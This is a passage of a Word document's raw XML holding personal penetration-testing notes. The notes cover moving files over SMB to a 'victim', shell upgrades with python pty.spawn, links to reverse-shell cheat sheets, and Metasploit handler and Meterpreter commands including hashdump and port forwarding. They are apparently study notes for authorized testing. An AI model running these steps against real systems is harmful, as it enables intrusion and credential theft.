      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filepath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00CA7D91" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\$LHOST\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA7D91">
        <w:t>kali\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>on victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F5D57" w14:textId="51D0010E" w:rsidR="0095586B" w:rsidRDefault="0095586B" w:rsidP="0095586B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can also copy from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C8723" w14:textId="0D1CA353" w:rsidR="00F722E4" w:rsidRPr="002E7A38" w:rsidRDefault="003878B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloading raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB022FB" w14:textId="16DE4C6E" w:rsidR="003878B2" w:rsidRDefault="003878B2">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and change to raw.githubusercontent.com and remove /blob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBAEBC6" w14:textId="7091387B" w:rsidR="00B56640" w:rsidRDefault="00B5664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Upgrade to BASH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED215F1" w14:textId="77777777" w:rsidR="00976BF6" w:rsidRDefault="00976BF6" w:rsidP="00976BF6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:left w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:right w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
        <w:spacing w:line="180" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2ACD4" w14:textId="5BB2529F" w:rsidR="00A915EB" w:rsidRDefault="00A915EB">
      <w:r>
        <w:t>If that fails, do first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B49BBCF" w14:textId="77777777" w:rsidR="00976BF6" w:rsidRDefault="00976BF6" w:rsidP="00976BF6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:left w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
          <w:right w:val="single" w:sz="6" w:space="5" w:color="C0C0C0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
        <w:spacing w:line="180" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63187F3E" w14:textId="3B7F4089" w:rsidR="00A915EB" w:rsidRPr="00B56640" w:rsidRDefault="00A915EB"/>
    <w:p w14:paraId="0ECDB01C" w14:textId="3EA71D7E" w:rsidR="003878B2" w:rsidRPr="002E7A38" w:rsidRDefault="00D8068E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18556F19" w14:textId="536A89A6" w:rsidR="00D8068E" w:rsidRDefault="00034E76" w:rsidP="00832BD2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7069"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00D8068E" w:rsidRPr="00564FBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00832BD2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA494A" w14:textId="354BB08B" w:rsidR="00D8068E" w:rsidRDefault="00034E76" w:rsidP="00D8068E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00D8068E" w:rsidRPr="00564FBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33C08370" w14:textId="013B9418" w:rsidR="000F13BF" w:rsidRDefault="00034E76" w:rsidP="00D8068E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:anchor="powershell" w:history="1">
        <w:r w:rsidR="003471D6" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77D3DF02" w14:textId="79AF9466" w:rsidR="003471D6" w:rsidRDefault="003471D6" w:rsidP="00D8068E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9A9B3"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="3B3D42"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9A9B3"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="3B3D42"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9A9B3"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="3B3D42"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9A9B3"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="3B3D42"/>
        </w:rPr>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ED17A4F" w14:textId="2C233F98" w:rsidR="00D8068E" w:rsidRPr="002E7A38" w:rsidRDefault="00D8068E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Find directory or file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669A0EA" w14:textId="324D330B" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Find / -name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66B3FB89" w14:textId="754B1624" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Locate filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D647A" w14:textId="3447A052" w:rsidR="00130DA7" w:rsidRPr="00130DA7" w:rsidRDefault="00130DA7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130DA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delete folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED52687" w14:textId="38D1D3D3" w:rsidR="00130DA7" w:rsidRDefault="00130DA7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rm -rf &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foldername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2ADB1E" w14:textId="15F6A098" w:rsidR="001D418B" w:rsidRPr="001D418B" w:rsidRDefault="001D418B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D418B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Run python 2 scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD0C35" w14:textId="243A6089" w:rsidR="001D418B" w:rsidRDefault="001D418B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pyenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> global 2.7.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B9A8C" w14:textId="66203639" w:rsidR="001D418B" w:rsidRDefault="001D418B" w:rsidP="001D418B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>myvenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F2322" w14:textId="18514D0F" w:rsidR="001D418B" w:rsidRDefault="001D418B">
      <w:r>
        <w:tab/>
        <w:t>Do stuff like pip2 install ... or python xxx.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02060A0D" w14:textId="1E96DEB6" w:rsidR="001D418B" w:rsidRDefault="001D418B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pyenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> global system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE796A7" w14:textId="61B62D26" w:rsidR="00F14730" w:rsidRPr="00F14730" w:rsidRDefault="00F14730">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14730">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFA253" w14:textId="4EFFB9B1" w:rsidR="00F14730" w:rsidRDefault="00F14730">
      <w:r>
        <w:t>Start with quick .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEFE92" w14:textId="3EE413F0" w:rsidR="00F14730" w:rsidRDefault="00F14730">
      <w:r>
        <w:t xml:space="preserve">If an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit doesn’t work, someone on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may have a fixed version so google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F048216" w14:textId="77777777" w:rsidR="001C203F" w:rsidRDefault="001C203F"/>
    <w:p w14:paraId="365029D5" w14:textId="2CB36E52" w:rsidR="00216231" w:rsidRPr="00915E3B" w:rsidRDefault="00216231" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C125B" w14:textId="5C1664D9" w:rsidR="00E203BD" w:rsidRDefault="00D8068E">
      <w:r>
        <w:t xml:space="preserve">Search to find exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit-DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75B621" w14:textId="05672581" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Search vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116851A" w14:textId="05364072" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:t>Select exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BF449" w14:textId="420E87A7" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4276F134" w14:textId="13A973F5" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:t>Set options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D23560" w14:textId="1A136A55" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394073C5" w14:textId="2C867AA0" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Set option value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B1C60" w14:textId="1F1A2BCB" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:t>Background session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A90859D" w14:textId="36582A04" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37616BCE" w14:textId="7EA1D2DC" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:t>Switch sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21232B80" w14:textId="7E52B010" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Sessions</w:t>
      </w:r>
      <w:r w:rsidR="005570D7">
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABDBD1D" w14:textId="44DFE3CE" w:rsidR="00D8068E" w:rsidRDefault="00D8068E">
      <w:r>
        <w:tab/>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessionnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E7A38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C332CFA" w14:textId="3B1ED39C" w:rsidR="008E7174" w:rsidRDefault="008E7174">
      <w:r>
        <w:t>Catch reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8D3A7" w14:textId="47A8FAE5" w:rsidR="008E7174" w:rsidRDefault="008E7174">
      <w:r>
        <w:tab/>
        <w:t>Use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADEB33" w14:textId="5A6A4B06" w:rsidR="008E7174" w:rsidRDefault="008E7174">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set payload ...         (to same as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACCFFB2" w14:textId="53657802" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11">
      <w:r>
        <w:t>Check if vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B9CB3A" w14:textId="6001F9A8" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11">
      <w:r>
        <w:tab/>
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457FF3C9" w14:textId="0C75FF20" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711F7E0" w14:textId="14616584" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:t>Switch to normal shell: shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4362C6" w14:textId="778034AB" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C717B69" w14:textId="423E6180" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upload file: upload &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F51C6" w14:textId="66E284D9" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:t>Download file: download &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186BBB3" w14:textId="77777777" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:t xml:space="preserve">Port forwarding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -L &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>locahost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; -l &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; -r &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remotehost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; -p &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remoteport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F6A33" w14:textId="2393DB5D" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:t>Edit file: edit &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4FA40" w14:textId="39EAE87D" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03E5D7C9" w14:textId="0239A5C2" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:r>
        <w:t>Ifconfig: ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898BCCB" w14:textId="680FC3CE" w:rsidR="007D5734" w:rsidRDefault="007D5734" w:rsidP="005570D7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FD7942C" w14:textId="532F4C29" w:rsidR="00996F9B" w:rsidRDefault="00996F9B" w:rsidP="005570D7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47116507" w14:textId="77777777" w:rsidR="0018435B" w:rsidRDefault="0018435B" w:rsidP="005570D7"/>
    <w:p w14:paraId="0EFD6B07" w14:textId="342DC9E8" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="005570D7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE14DC" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>List all databases at the site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A2F924" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
